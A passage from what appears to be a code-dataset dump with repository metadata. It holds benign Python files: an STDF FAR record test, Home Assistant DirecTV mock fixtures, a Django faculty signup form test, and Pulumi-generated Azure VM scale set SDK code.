subj_id = int(row[0])
hadm_id = int(row[1])
text = row[3]
#keep reading until you hit a new hadm id
if hadm_id != cur_hadm or subj_id != cur_subj:
yield cur_subj, cur_text, cur_hadm
cur_text = text
cur_subj = subj_id
cur_hadm = hadm_id
else:
#concatenate to the discharge summary and move on
cur_text += " " + text
yield cur_subj, cur_text, cur_hadm
| true | true |
7901219870ed42d9c90e5151521dfeebde965c41 | 1,563 | py | Python | tests/STDF/test_FAR.py | awinia-github/Semi-ATE-STDF | f9f4e6544928f56a9be150bdbc38971ac32dd9fc | [
"MIT"
] | null | null | null | tests/STDF/test_FAR.py | awinia-github/Semi-ATE-STDF | f9f4e6544928f56a9be150bdbc38971ac32dd9fc | [
"MIT"
] | null | null | null | tests/STDF/test_FAR.py | awinia-github/Semi-ATE-STDF | f9f4e6544928f56a9be150bdbc38971ac32dd9fc | [
"MIT"
] | null | null | null | import os
import tempfile
from tests.STDF.STDFRecordTest import STDFRecordTest
from STDF import FAR
# File Attributes Record
# Functuion:
# Contains the information necessary to determine
# how to decode the STDF datacontained in the file.
def test_FAR():
far('<')
far('>')
def far(end):
# STDF v4 page 57
record = FAR(endian = end)
# Test serialization
# 1. Save FAR STDF record into a file
# 2. Read byte by byte and compare with expected value
tf = tempfile.NamedTemporaryFile(delete=False)
f = open(tf.name, "wb")
w_data = record.__repr__()
f.write(w_data)
f.close
f = open(tf.name, "rb")
stdfRecTest = STDFRecordTest(f, end)
# rec_len, rec_type, rec_sub
stdfRecTest.assert_file_record_header(2, 0, 10)
# Test REC_CPU, expected value 2
stdfRecTest.assert_ubyte(2);
# Test STDF_VER, expected value 4
stdfRecTest.assert_ubyte(4);
f.close()
# Test de-serialization
# 1. Open STDF record from a file
# 2. Read record fields and compare with the expected value
inst = FAR('V4', end, w_data)
# rec_len, rec_type, rec_sub
stdfRecTest.assert_instance_record_header(inst , 2, 0, 10)
# Test REC_CPU field, position 3, value 2
stdfRecTest.assert_instance_field(inst, 3, 2);
# Test STDF_VER field, position 4, value 4
stdfRecTest.assert_instance_field(inst, 4, 4);
# Test ATDF output
expected_atdf = "FAR:A|4|2|U"
assert inst.to_atdf() == expected_atdf
# ToDo: Test JSON output
os.remove(tf.name)
| 25.209677 | 62 | 0.672425 | import os
import tempfile
from tests.STDF.STDFRecordTest import STDFRecordTest
from STDF import FAR
def test_FAR():
far('<')
far('>')
def far(end):
record = FAR(endian = end)
tf = tempfile.NamedTemporaryFile(delete=False)
f = open(tf.name, "wb")
w_data = record.__repr__()
f.write(w_data)
f.close
f = open(tf.name, "rb")
stdfRecTest = STDFRecordTest(f, end)
stdfRecTest.assert_file_record_header(2, 0, 10)
stdfRecTest.assert_ubyte(2);
stdfRecTest.assert_ubyte(4);
f.close()
inst = FAR('V4', end, w_data)
stdfRecTest.assert_instance_record_header(inst , 2, 0, 10)
stdfRecTest.assert_instance_field(inst, 3, 2);
stdfRecTest.assert_instance_field(inst, 4, 4);
expected_atdf = "FAR:A|4|2|U"
assert inst.to_atdf() == expected_atdf
os.remove(tf.name)
| true | true |
790121ddca1355464b2166c981c47760f734c1d7 | 3,982 | py | Python | tests/components/directv/__init__.py | DoctorU/core | 5b218d7e1c4164e32d41473977459cbaf23adf42 | [
"Apache-2.0"
] | 7 | 2019-08-15T13:36:58.000Z | 2020-03-18T10:46:29.000Z | tests/components/directv/__init__.py | DoctorU/core | 5b218d7e1c4164e32d41473977459cbaf23adf42 | [
"Apache-2.0"
] | 87 | 2020-07-15T13:43:35.000Z | 2022-03-23T07:43:10.000Z | tests/components/directv/__init__.py | DoctorU/core | 5b218d7e1c4164e32d41473977459cbaf23adf42 | [
"Apache-2.0"
] | 7 | 2018-10-04T10:12:45.000Z | 2021-12-29T20:55:40.000Z | """Tests for the DirecTV component."""
from http import HTTPStatus
from homeassistant.components.directv.const import CONF_RECEIVER_ID, DOMAIN
from homeassistant.components.ssdp import ATTR_SSDP_LOCATION
from homeassistant.const import CONF_HOST, CONTENT_TYPE_JSON
from homeassistant.core import HomeAssistant
from tests.common import MockConfigEntry, load_fixture
from tests.test_util.aiohttp import AiohttpClientMocker
HOST = "127.0.0.1"
RECEIVER_ID = "028877455858"
SSDP_LOCATION = "http://127.0.0.1/"
UPNP_SERIAL = "RID-028877455858"
MOCK_CONFIG = {DOMAIN: [{CONF_HOST: HOST}]}
MOCK_SSDP_DISCOVERY_INFO = {ATTR_SSDP_LOCATION: SSDP_LOCATION}
MOCK_USER_INPUT = {CONF_HOST: HOST}
def mock_connection(aioclient_mock: AiohttpClientMocker) -> None:
"""Mock the DirecTV connection for Home Assistant."""
aioclient_mock.get(
f"http://{HOST}:8080/info/getVersion",
text=load_fixture("directv/info-get-version.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/getLocations",
text=load_fixture("directv/info-get-locations.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/mode",
params={"clientAddr": "B01234567890"},
text=load_fixture("directv/info-mode-standby.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/mode",
params={"clientAddr": "9XXXXXXXXXX9"},
status=HTTPStatus.INTERNAL_SERVER_ERROR,
text=load_fixture("directv/info-mode-error.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/mode",
text=load_fixture("directv/info-mode.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/remote/processKey",
text=load_fixture("directv/remote-process-key.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/tune",
text=load_fixture("directv/tv-tune.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
params={"clientAddr": "2CA17D1CD30X"},
text=load_fixture("directv/tv-get-tuned.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
params={"clientAddr": "A01234567890"},
text=load_fixture("directv/tv-get-tuned-music.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
params={"clientAddr": "C01234567890"},
status=HTTPStatus.FORBIDDEN,
text=load_fixture("directv/tv-get-tuned-restricted.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
text=load_fixture("directv/tv-get-tuned-movie.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
async def setup_integration(
hass: HomeAssistant,
aioclient_mock: AiohttpClientMocker,
skip_entry_setup: bool = False,
setup_error: bool = False,
) -> MockConfigEntry:
"""Set up the DirecTV integration in Home Assistant."""
if setup_error:
aioclient_mock.get(
f"http://{HOST}:8080/info/getVersion",
status=HTTPStatus.INTERNAL_SERVER_ERROR,
)
else:
mock_connection(aioclient_mock)
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=RECEIVER_ID,
data={CONF_HOST: HOST, CONF_RECEIVER_ID: RECEIVER_ID},
)
entry.add_to_hass(hass)
if not skip_entry_setup:
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
return entry
| 31.603175 | 75 | 0.668257 | from http import HTTPStatus
from homeassistant.components.directv.const import CONF_RECEIVER_ID, DOMAIN
from homeassistant.components.ssdp import ATTR_SSDP_LOCATION
from homeassistant.const import CONF_HOST, CONTENT_TYPE_JSON
from homeassistant.core import HomeAssistant
from tests.common import MockConfigEntry, load_fixture
from tests.test_util.aiohttp import AiohttpClientMocker
HOST = "127.0.0.1"
RECEIVER_ID = "028877455858"
SSDP_LOCATION = "http://127.0.0.1/"
UPNP_SERIAL = "RID-028877455858"
MOCK_CONFIG = {DOMAIN: [{CONF_HOST: HOST}]}
MOCK_SSDP_DISCOVERY_INFO = {ATTR_SSDP_LOCATION: SSDP_LOCATION}
MOCK_USER_INPUT = {CONF_HOST: HOST}
def mock_connection(aioclient_mock: AiohttpClientMocker) -> None:
aioclient_mock.get(
f"http://{HOST}:8080/info/getVersion",
text=load_fixture("directv/info-get-version.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/getLocations",
text=load_fixture("directv/info-get-locations.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/mode",
params={"clientAddr": "B01234567890"},
text=load_fixture("directv/info-mode-standby.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/mode",
params={"clientAddr": "9XXXXXXXXXX9"},
status=HTTPStatus.INTERNAL_SERVER_ERROR,
text=load_fixture("directv/info-mode-error.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/info/mode",
text=load_fixture("directv/info-mode.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/remote/processKey",
text=load_fixture("directv/remote-process-key.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/tune",
text=load_fixture("directv/tv-tune.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
params={"clientAddr": "2CA17D1CD30X"},
text=load_fixture("directv/tv-get-tuned.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
params={"clientAddr": "A01234567890"},
text=load_fixture("directv/tv-get-tuned-music.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
params={"clientAddr": "C01234567890"},
status=HTTPStatus.FORBIDDEN,
text=load_fixture("directv/tv-get-tuned-restricted.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
aioclient_mock.get(
f"http://{HOST}:8080/tv/getTuned",
text=load_fixture("directv/tv-get-tuned-movie.json"),
headers={"Content-Type": CONTENT_TYPE_JSON},
)
async def setup_integration(
hass: HomeAssistant,
aioclient_mock: AiohttpClientMocker,
skip_entry_setup: bool = False,
setup_error: bool = False,
) -> MockConfigEntry:
if setup_error:
aioclient_mock.get(
f"http://{HOST}:8080/info/getVersion",
status=HTTPStatus.INTERNAL_SERVER_ERROR,
)
else:
mock_connection(aioclient_mock)
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=RECEIVER_ID,
data={CONF_HOST: HOST, CONF_RECEIVER_ID: RECEIVER_ID},
)
entry.add_to_hass(hass)
if not skip_entry_setup:
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
return entry
| true | true |
79012277efcc80bf75bc48523cd2e8a4d97738ec | 2,422 | py | Python | Pinocchio/faculty/tests/test_forms.py | shreygoel7/Pinocchio | b08c6dde591f0de948ef67db7ad83bf8fc4bfa62 | [
"MIT"
] | null | null | null | Pinocchio/faculty/tests/test_forms.py | shreygoel7/Pinocchio | b08c6dde591f0de948ef67db7ad83bf8fc4bfa62 | [
"MIT"
] | null | null | null | Pinocchio/faculty/tests/test_forms.py | shreygoel7/Pinocchio | b08c6dde591f0de948ef67db7ad83bf8fc4bfa62 | [
"MIT"
] | 1 | 2021-11-27T09:23:20.000Z | 2021-11-27T09:23:20.000Z | from academicInfo.models import Department
from faculty.forms import FacultySignupForm
from faculty.models import Faculty
from django.contrib.auth.models import User
from django.test import TestCase
from django.utils import timezone
class FacultySignupFormTest(TestCase):
def test_signup_form_label(self):
form = FacultySignupForm()
self.assertTrue(
form.fields['first_name'].label == 'First Name' and
form.fields['last_name'].label == 'Last Name' and
form.fields['username'].label == 'Roll number' and
form.fields['dob'].label == 'Date of Birth' and
form.fields['department'].label == 'Department' and
form.fields['email'].label == 'Email'
)
def test_signup_form_required_fields(self):
form = FacultySignupForm()
self.assertTrue(
form.fields['first_name'].required == True and
form.fields['last_name'].required == True and
form.fields['dob'].required == True and
form.fields['department'].required == True and
form.fields['email'].required == True
)
def test_invalid_email_validation(self):
startTime = timezone.now()
department = Department.objects.create(name='test department')
user = User.objects.create(
username='test',
email='test@gmail.com'
)
faculty = Faculty.objects.create(
user=user,
dob=startTime,
department=department
)
form = FacultySignupForm(
data = {
'username': 'test1',
'email': 'test@gmail.com',
'dob': startTime,
'department': department
}
)
self.assertFalse(form.is_valid())
def test_valid_email_validation(self):
startTime = timezone.now()
department = Department.objects.create(name='test department')
form = FacultySignupForm(
data = {
'username': 'test',
'first_name': 'Bob',
'last_name': 'Davidson',
'dob': startTime,
'email': 'test@gmail.com',
'password1': 'complex1password',
'password2': 'complex1password',
'department': department
}
)
self.assertTrue(form.is_valid())
| 32.293333 | 70 | 0.565648 | from academicInfo.models import Department
from faculty.forms import FacultySignupForm
from faculty.models import Faculty
from django.contrib.auth.models import User
from django.test import TestCase
from django.utils import timezone
class FacultySignupFormTest(TestCase):
def test_signup_form_label(self):
form = FacultySignupForm()
self.assertTrue(
form.fields['first_name'].label == 'First Name' and
form.fields['last_name'].label == 'Last Name' and
form.fields['username'].label == 'Roll number' and
form.fields['dob'].label == 'Date of Birth' and
form.fields['department'].label == 'Department' and
form.fields['email'].label == 'Email'
)
def test_signup_form_required_fields(self):
form = FacultySignupForm()
self.assertTrue(
form.fields['first_name'].required == True and
form.fields['last_name'].required == True and
form.fields['dob'].required == True and
form.fields['department'].required == True and
form.fields['email'].required == True
)
def test_invalid_email_validation(self):
startTime = timezone.now()
department = Department.objects.create(name='test department')
user = User.objects.create(
username='test',
email='test@gmail.com'
)
faculty = Faculty.objects.create(
user=user,
dob=startTime,
department=department
)
form = FacultySignupForm(
data = {
'username': 'test1',
'email': 'test@gmail.com',
'dob': startTime,
'department': department
}
)
self.assertFalse(form.is_valid())
def test_valid_email_validation(self):
startTime = timezone.now()
department = Department.objects.create(name='test department')
form = FacultySignupForm(
data = {
'username': 'test',
'first_name': 'Bob',
'last_name': 'Davidson',
'dob': startTime,
'email': 'test@gmail.com',
'password1': 'complex1password',
'password2': 'complex1password',
'department': department
}
)
self.assertTrue(form.is_valid())
| true | true |
790122b3d487f06bf6368199e38049d67c197daf | 17,549 | py | Python | sdk/python/pulumi_azure_native/compute/get_virtual_machine_scale_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/compute/get_virtual_machine_scale_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/compute/get_virtual_machine_scale_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetVirtualMachineScaleSetResult',
'AwaitableGetVirtualMachineScaleSetResult',
'get_virtual_machine_scale_set',
]
@pulumi.output_type
class GetVirtualMachineScaleSetResult:
"""
Describes a Virtual Machine Scale Set.
"""
def __init__(__self__, additional_capabilities=None, automatic_repairs_policy=None, do_not_run_extensions_on_overprovisioned_vms=None, extended_location=None, host_group=None, id=None, identity=None, location=None, name=None, orchestration_mode=None, overprovision=None, plan=None, platform_fault_domain_count=None, provisioning_state=None, proximity_placement_group=None, scale_in_policy=None, single_placement_group=None, sku=None, tags=None, type=None, unique_id=None, upgrade_policy=None, virtual_machine_profile=None, zone_balance=None, zones=None):
if additional_capabilities and not isinstance(additional_capabilities, dict):
raise TypeError("Expected argument 'additional_capabilities' to be a dict")
pulumi.set(__self__, "additional_capabilities", additional_capabilities)
if automatic_repairs_policy and not isinstance(automatic_repairs_policy, dict):
raise TypeError("Expected argument 'automatic_repairs_policy' to be a dict")
pulumi.set(__self__, "automatic_repairs_policy", automatic_repairs_policy)
if do_not_run_extensions_on_overprovisioned_vms and not isinstance(do_not_run_extensions_on_overprovisioned_vms, bool):
raise TypeError("Expected argument 'do_not_run_extensions_on_overprovisioned_vms' to be a bool")
pulumi.set(__self__, "do_not_run_extensions_on_overprovisioned_vms", do_not_run_extensions_on_overprovisioned_vms)
if extended_location and not isinstance(extended_location, dict):
raise TypeError("Expected argument 'extended_location' to be a dict")
pulumi.set(__self__, "extended_location", extended_location)
if host_group and not isinstance(host_group, dict):
raise TypeError("Expected argument 'host_group' to be a dict")
pulumi.set(__self__, "host_group", host_group)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if orchestration_mode and not isinstance(orchestration_mode, str):
raise TypeError("Expected argument 'orchestration_mode' to be a str")
pulumi.set(__self__, "orchestration_mode", orchestration_mode)
if overprovision and not isinstance(overprovision, bool):
raise TypeError("Expected argument 'overprovision' to be a bool")
pulumi.set(__self__, "overprovision", overprovision)
if plan and not isinstance(plan, dict):
raise TypeError("Expected argument 'plan' to be a dict")
pulumi.set(__self__, "plan", plan)
if platform_fault_domain_count and not isinstance(platform_fault_domain_count, int):
raise TypeError("Expected argument 'platform_fault_domain_count' to be a int")
pulumi.set(__self__, "platform_fault_domain_count", platform_fault_domain_count)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if proximity_placement_group and not isinstance(proximity_placement_group, dict):
raise TypeError("Expected argument 'proximity_placement_group' to be a dict")
pulumi.set(__self__, "proximity_placement_group", proximity_placement_group)
if scale_in_policy and not isinstance(scale_in_policy, dict):
raise TypeError("Expected argument 'scale_in_policy' to be a dict")
pulumi.set(__self__, "scale_in_policy", scale_in_policy)
if single_placement_group and not isinstance(single_placement_group, bool):
raise TypeError("Expected argument 'single_placement_group' to be a bool")
pulumi.set(__self__, "single_placement_group", single_placement_group)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if unique_id and not isinstance(unique_id, str):
raise TypeError("Expected argument 'unique_id' to be a str")
pulumi.set(__self__, "unique_id", unique_id)
if upgrade_policy and not isinstance(upgrade_policy, dict):
raise TypeError("Expected argument 'upgrade_policy' to be a dict")
pulumi.set(__self__, "upgrade_policy", upgrade_policy)
if virtual_machine_profile and not isinstance(virtual_machine_profile, dict):
raise TypeError("Expected argument 'virtual_machine_profile' to be a dict")
pulumi.set(__self__, "virtual_machine_profile", virtual_machine_profile)
if zone_balance and not isinstance(zone_balance, bool):
raise TypeError("Expected argument 'zone_balance' to be a bool")
pulumi.set(__self__, "zone_balance", zone_balance)
if zones and not isinstance(zones, list):
raise TypeError("Expected argument 'zones' to be a list")
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="additionalCapabilities")
def additional_capabilities(self) -> Optional['outputs.AdditionalCapabilitiesResponse']:
"""
Specifies additional capabilities enabled or disabled on the Virtual Machines in the Virtual Machine Scale Set. For instance: whether the Virtual Machines have the capability to support attaching managed data disks with UltraSSD_LRS storage account type.
"""
return pulumi.get(self, "additional_capabilities")
@property
@pulumi.getter(name="automaticRepairsPolicy")
def automatic_repairs_policy(self) -> Optional['outputs.AutomaticRepairsPolicyResponse']:
"""
Policy for automatic repairs.
"""
return pulumi.get(self, "automatic_repairs_policy")
@property
@pulumi.getter(name="doNotRunExtensionsOnOverprovisionedVMs")
def do_not_run_extensions_on_overprovisioned_vms(self) -> Optional[bool]:
"""
When Overprovision is enabled, extensions are launched only on the requested number of VMs which are finally kept. This property will hence ensure that the extensions do not run on the extra overprovisioned VMs.
"""
return pulumi.get(self, "do_not_run_extensions_on_overprovisioned_vms")
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> Optional['outputs.ExtendedLocationResponse']:
"""
The extended location of the Virtual Machine Scale Set.
"""
return pulumi.get(self, "extended_location")
@property
@pulumi.getter(name="hostGroup")
def host_group(self) -> Optional['outputs.SubResourceResponse']:
"""
Specifies information about the dedicated host group that the virtual machine scale set resides in. <br><br>Minimum api-version: 2020-06-01.
"""
return pulumi.get(self, "host_group")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.VirtualMachineScaleSetIdentityResponse']:
"""
The identity of the virtual machine scale set, if configured.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="orchestrationMode")
def orchestration_mode(self) -> Optional[str]:
"""
Specifies the orchestration mode for the virtual machine scale set.
"""
return pulumi.get(self, "orchestration_mode")
@property
@pulumi.getter
def overprovision(self) -> Optional[bool]:
"""
Specifies whether the Virtual Machine Scale Set should be overprovisioned.
"""
return pulumi.get(self, "overprovision")
@property
@pulumi.getter
def plan(self) -> Optional['outputs.PlanResponse']:
"""
Specifies information about the marketplace image used to create the virtual machine. This element is only used for marketplace images. Before you can use a marketplace image from an API, you must enable the image for programmatic use. In the Azure portal, find the marketplace image that you want to use and then click **Want to deploy programmatically, Get Started ->**. Enter any required information and then click **Save**.
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter(name="platformFaultDomainCount")
def platform_fault_domain_count(self) -> Optional[int]:
"""
Fault Domain count for each placement group.
"""
return pulumi.get(self, "platform_fault_domain_count")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="proximityPlacementGroup")
def proximity_placement_group(self) -> Optional['outputs.SubResourceResponse']:
"""
Specifies information about the proximity placement group that the virtual machine scale set should be assigned to. <br><br>Minimum api-version: 2018-04-01.
"""
return pulumi.get(self, "proximity_placement_group")
@property
@pulumi.getter(name="scaleInPolicy")
def scale_in_policy(self) -> Optional['outputs.ScaleInPolicyResponse']:
"""
Specifies the scale-in policy that decides which virtual machines are chosen for removal when a Virtual Machine Scale Set is scaled-in.
"""
return pulumi.get(self, "scale_in_policy")
@property
@pulumi.getter(name="singlePlacementGroup")
def single_placement_group(self) -> Optional[bool]:
"""
When true this limits the scale set to a single placement group, of max size 100 virtual machines. NOTE: If singlePlacementGroup is true, it may be modified to false. However, if singlePlacementGroup is false, it may not be modified to true.
"""
return pulumi.get(self, "single_placement_group")
@property
@pulumi.getter
def sku(self) -> Optional['outputs.SkuResponse']:
"""
The virtual machine scale set sku.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="uniqueId")
def unique_id(self) -> str:
"""
Specifies the ID which uniquely identifies a Virtual Machine Scale Set.
"""
return pulumi.get(self, "unique_id")
@property
@pulumi.getter(name="upgradePolicy")
def upgrade_policy(self) -> Optional['outputs.UpgradePolicyResponse']:
"""
The upgrade policy.
"""
return pulumi.get(self, "upgrade_policy")
@property
@pulumi.getter(name="virtualMachineProfile")
def virtual_machine_profile(self) -> Optional['outputs.VirtualMachineScaleSetVMProfileResponse']:
"""
The virtual machine profile.
"""
return pulumi.get(self, "virtual_machine_profile")
@property
@pulumi.getter(name="zoneBalance")
def zone_balance(self) -> Optional[bool]:
"""
Whether to force strictly even Virtual Machine distribution cross x-zones in case there is zone outage.
"""
return pulumi.get(self, "zone_balance")
@property
@pulumi.getter
def zones(self) -> Optional[Sequence[str]]:
"""
The virtual machine scale set zones. NOTE: Availability zones can only be set when you create the scale set
"""
return pulumi.get(self, "zones")
class AwaitableGetVirtualMachineScaleSetResult(GetVirtualMachineScaleSetResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualMachineScaleSetResult(
additional_capabilities=self.additional_capabilities,
automatic_repairs_policy=self.automatic_repairs_policy,
do_not_run_extensions_on_overprovisioned_vms=self.do_not_run_extensions_on_overprovisioned_vms,
extended_location=self.extended_location,
host_group=self.host_group,
id=self.id,
identity=self.identity,
location=self.location,
name=self.name,
orchestration_mode=self.orchestration_mode,
overprovision=self.overprovision,
plan=self.plan,
platform_fault_domain_count=self.platform_fault_domain_count,
provisioning_state=self.provisioning_state,
proximity_placement_group=self.proximity_placement_group,
scale_in_policy=self.scale_in_policy,
single_placement_group=self.single_placement_group,
sku=self.sku,
tags=self.tags,
type=self.type,
unique_id=self.unique_id,
upgrade_policy=self.upgrade_policy,
virtual_machine_profile=self.virtual_machine_profile,
zone_balance=self.zone_balance,
zones=self.zones)
def get_virtual_machine_scale_set(expand: Optional[str] = None,
resource_group_name: Optional[str] = None,
vm_scale_set_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualMachineScaleSetResult:
"""
Describes a Virtual Machine Scale Set.
API Version: 2021-03-01.
:param str expand: The expand expression to apply on the operation. 'UserData' retrieves the UserData property of the VM scale set that was provided by the user during the VM scale set Create/Update operation
:param str resource_group_name: The name of the resource group.
:param str vm_scale_set_name: The name of the VM scale set.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['resourceGroupName'] = resource_group_name
__args__['vmScaleSetName'] = vm_scale_set_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:compute:getVirtualMachineScaleSet', __args__, opts=opts, typ=GetVirtualMachineScaleSetResult).value
return AwaitableGetVirtualMachineScaleSetResult(
additional_capabilities=__ret__.additional_capabilities,
automatic_repairs_policy=__ret__.automatic_repairs_policy,
do_not_run_extensions_on_overprovisioned_vms=__ret__.do_not_run_extensions_on_overprovisioned_vms,
extended_location=__ret__.extended_location,
host_group=__ret__.host_group,
id=__ret__.id,
identity=__ret__.identity,
location=__ret__.location,
name=__ret__.name,
orchestration_mode=__ret__.orchestration_mode,
overprovision=__ret__.overprovision,
plan=__ret__.plan,
platform_fault_domain_count=__ret__.platform_fault_domain_count,
provisioning_state=__ret__.provisioning_state,
proximity_placement_group=__ret__.proximity_placement_group,
scale_in_policy=__ret__.scale_in_policy,
single_placement_group=__ret__.single_placement_group,
sku=__ret__.sku,
tags=__ret__.tags,
type=__ret__.type,
unique_id=__ret__.unique_id,
upgrade_policy=__ret__.upgrade_policy,
virtual_machine_profile=__ret__.virtual_machine_profile,
zone_balance=__ret__.zone_balance,
zones=__ret__.zones)
| 45.819843 | 558 | 0.690182 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetVirtualMachineScaleSetResult',
'AwaitableGetVirtualMachineScaleSetResult',
'get_virtual_machine_scale_set',
]
@pulumi.output_type
class GetVirtualMachineScaleSetResult:
def __init__(__self__, additional_capabilities=None, automatic_repairs_policy=None, do_not_run_extensions_on_overprovisioned_vms=None, extended_location=None, host_group=None, id=None, identity=None, location=None, name=None, orchestration_mode=None, overprovision=None, plan=None, platform_fault_domain_count=None, provisioning_state=None, proximity_placement_group=None, scale_in_policy=None, single_placement_group=None, sku=None, tags=None, type=None, unique_id=None, upgrade_policy=None, virtual_machine_profile=None, zone_balance=None, zones=None):
if additional_capabilities and not isinstance(additional_capabilities, dict):
raise TypeError("Expected argument 'additional_capabilities' to be a dict")
pulumi.set(__self__, "additional_capabilities", additional_capabilities)
if automatic_repairs_policy and not isinstance(automatic_repairs_policy, dict):
raise TypeError("Expected argument 'automatic_repairs_policy' to be a dict")
pulumi.set(__self__, "automatic_repairs_policy", automatic_repairs_policy)
if do_not_run_extensions_on_overprovisioned_vms and not isinstance(do_not_run_extensions_on_overprovisioned_vms, bool):
raise TypeError("Expected argument 'do_not_run_extensions_on_overprovisioned_vms' to be a bool")
pulumi.set(__self__, "do_not_run_extensions_on_overprovisioned_vms", do_not_run_extensions_on_overprovisioned_vms)
if extended_location and not isinstance(extended_location, dict):
raise TypeError("Expected argument 'extended_location' to be a dict")
pulumi.set(__self__, "extended_location", extended_location)
if host_group and not isinstance(host_group, dict):
raise TypeError("Expected argument 'host_group' to be a dict")
pulumi.set(__self__, "host_group", host_group)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
